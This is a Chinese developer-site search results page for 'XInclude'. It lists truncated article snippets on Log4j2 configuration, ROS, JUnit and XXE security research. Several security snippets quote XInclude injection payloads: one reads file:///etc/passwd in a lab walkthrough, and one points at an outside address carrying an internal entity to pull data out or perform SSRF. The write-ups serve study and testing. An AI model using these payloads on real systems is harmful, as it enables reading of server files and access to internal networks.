首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏有价值炮灰

    XML 相关漏洞风险研究

    关于 XSD 更多的数据结构和数据类型定义,可以参考下面的文档: XML Schema (W3C) W3Cs XML Schema Primer XInclude XML Inclusions (XInclude > 前文我们学习了 XSD,下面则是 XInclude 元素的 XSD 描述: https://www.w3.org/2001/XInclude/XInclude.xsd 主要定义了 include 标签和 XInclude - wikipedia Using XInclude XInclude Standard XSLT XSLT 全称为 Extensible Stylesheet Language Transformations 我们前面说过 XInclude 是不使用外部实体的一个建议标准,如果 XML 解析器没有禁用 XInclude 的话也可能会造成 XXE 攻击,比如 ImageMagick 的 CVE-2023-38633 </foo> 那么,我们把 XInclude 也禁用就好了吧!

    2.8K10编辑于 2024-06-03
  • 来自专栏漏斗社区

    歪?我想要一个XXE。

    实体的攻击方式 XML Schema攻击的分类 根据FB的小编对外文的翻译,得知XML Schema攻击分为: 1.schemaLocation 2.noNamespaceSchemaLocation 3.XInclude XInclude XInclude在XML Schema, DTD, and Entity Attacks 的文档中有提到,但是经过测试和查阅材料,在微软的将 XML 文档与 XInclude 合并在一起这篇文档中有提到并不是所有 XML 语法分析程序都支持 XInclude,W3C在XInclude Implementations Report中列出了支持的列表,include的href属性中可以进行文件读取,也可以使用协议进行 SSRF,freebuf中是使用DTD实体的方式再结合XInclude进行利用的,似乎觉得有些不大贴切,因为如果可以使用XInclude的话那么就不需要使用DTD了,直接在href属性中利用协议获取信息 <data xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>"><xi:include href="http://192.168.2.31/&internal;" parse

    1.7K90发布于 2018-03-28
  • 来自专栏奝-大周

    xxe漏洞学习

    " >]> <catalog> <core id="test101"> <description>&xxe;</description> </core> </catalog> XInclude > <data xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>"><xi:include href="http://publicServer.com/file.xml

    74920发布于 2020-08-19
  • 来自专栏Java进阶之路

    高性能的Java日志框架log4j2

    > <Configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" status="warn" name="<em>XInclude</em> > <Configuration xmlns:xi="http://www.w3.org/2001/XInclude" status="warn" name="XInclude

    1.4K20发布于 2021-04-13
  • 来自专栏A周立SpringCloud

    Log4j2,性能无敌,横扫对手

    > <Configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" status="warn" name="<em>XInclude</em> > <Configuration xmlns:xi="http://www.w3.org/2001/XInclude" status="warn" name="XInclude

    71820发布于 2021-10-12
  • 来自专栏好好学java的技术栈

    最牛逼的 Java 日志框架,性能无敌,横扫所有对手.....

    > <Configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" status="warn" name="<em>XInclude</em> > <Configuration xmlns:xi="http://www.w3.org/2001/XInclude" status="warn" name="XInclude

    1.3K20发布于 2021-10-09
  • 来自专栏JAVA杂谈

    还在用Logback?Log4j2的异步性能已经无敌了,还不快试试

    > <Configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" status="warn" name="<em>XInclude</em> > <Configuration xmlns:xi="http://www.w3.org/2001/XInclude" status="warn" name="XInclude

    1.4K40发布于 2021-04-23
  • 来自专栏黑伞安全

    XXE -XML External Entity

    ,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] 隐藏的XXE表面 XInclude 但是,您可能可以改用XIncludeXInclude 是XML规范的一部分,该规范允许从子文档中构建XML文档。 您可以在XML文档的任何数据值中放置XInclude 攻击,因此可以在仅控制放置在服务器端XML文档中的单个数据项的情况下执行攻击。 要执行XInclude 攻击,您需要引用XInclude 命名空间,并提供要包含的文件的路径。 例如: productId=<foo xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>"><xi:include parse="text" href="file:///

    2.1K20发布于 2020-08-13
  • 来自专栏芋道源码1024

    最牛逼的 Java 日志框架,性能无敌,横扫所有对手.....

    > <Configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" status="warn" name="<em>XInclude</em> > <Configuration xmlns:xi="http://www.w3.org/2001/XInclude" status="warn" name="XInclude

    79320发布于 2021-10-14
  • 来自专栏卓文见识

    XML外部实体(XXE)注入原理解析及实战案例全汇总

    Content-Type等方式进行挖掘,思路一般分三步: 检测XML是否会被成功解析以及是否支持DTD引用外部实体,有回显或者报错;; 需注意没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据 最后可以尝试XInclude ,某些应用程序接收客户端提交的数据,将其嵌入到服务器端的XML文档中,然后解析文档,尝试payload: <fooxmlns:xi=“http://www.w3.org/2001/XInclude”>

    19K41发布于 2019-09-29
  • 来自专栏网站漏洞修复

    渗透测试该如何全面检测网站漏洞

    XInclude <?xml version='1.0'? > <data xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>"><xi:include href="/file.xml"></xi:incl 3.10 模板注入漏洞

    2.3K20发布于 2019-10-12
  • 来自专栏张善友的专栏

    asp.net mvc相关开源项目推荐

    Mvp.Xml除了可以让 System.Xml 更好用之外,最主要的是他提早实做许多Microsoft还来不及包在 Framework 里面的 XML 标准的类别,例如:EXSLT、XML Base、XInclude

    2.5K60发布于 2018-01-22
  • 来自专栏网站漏洞修补

    渗透测试该如何全面检测网站漏洞

    XInclude <?xml version='1.0'? > <data xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>"><xi:include href="/file.xml"></xi:incl 3.10 模板注入漏洞

    2.8K70发布于 2019-10-11
  • 来自专栏开源部署

    RHEL-6.1/5.4安装Heartbeat-3-0-7有可能碰见的各种错误及解决方法

    /configure --prefix=$PREFIX --enable-fatal-warnings=no LIBS='/lib64/libuuid.so.1' gmake[1]: --xinclude

    75610编辑于 2022-06-30
  • 来自专栏萌新学习日志

    C语言中的函数(1)

    3.2 函数的举例 废话不多说上实战:写一个加法函数,完成两个整型变量的相加的操作 #xinclude<stdio.h> int main() { int a=0; int b=0; scanf

    4710编辑于 2026-01-15
  • 来自专栏FreeBuf

    PHP代码审计——新秀企业网站V1.0

    引用:https://cloud.tencent.com/developer/article/1464774 08、Exploiting XInclude to retrieve files 描述 要解决实验室问题,请注入一条XInclude语句来检索/etc/passwd文件的内容。 解决方案 1.访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 2.将productId参数值设置为: <foo xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>"><xi:include parse="text" href="file

    3K20编辑于 2023-03-30
  • 来自专栏雨临Lewis的博客

    Log4j、Log4j2问题汇总

    > <configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" monitorInterval="30" status="error"> 不只是某个项目的配置文件使用,可能多个项目之间都是共享同样的变量值,这时候可以通过将公共的参数变量定义到一个单独的文件中,然后通过include标签来引入参数文件: 首先定义一个单独的参数文件,假如命名为log4j-xinclude-properties.xml > <configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" monitorInterval="30"> <xi:include href ="log4j-<em>xinclude</em>-properties.xml" /> <Appenders> <!

    4.5K30编辑于 2022-01-12
  • 来自专栏雨临Lewis的博客

    ELK系列(1) - Elasticsearch + Logstash + Kibana + Log4j2快速入门与搭建用例

    > <configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" monitorInterval="30"> <Properties> > <configuration xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" monitorInterval="30"> <Properties>

    70620编辑于 2022-01-12
  • 来自专栏CreateAMind

    ROS深入探索(六)——使用smartcar进行仿真

    > <robot name="smartcar" xmlns:xi="http://www.w3.org/2001/<em>XInclude</em>" xmlns:gazebo="http

    73320发布于 2018-07-24
  • 来自专栏python3

    JUnit 4 与 JUnit 3

    例如,W3C XInclude 测试套件测试 Java 还不支持的一些 Unicode 编码的自动识别。 ParsingException, IOException, XIncludeException { File input = new File( "data/xinclude

    1.4K20发布于 2020-01-06
领券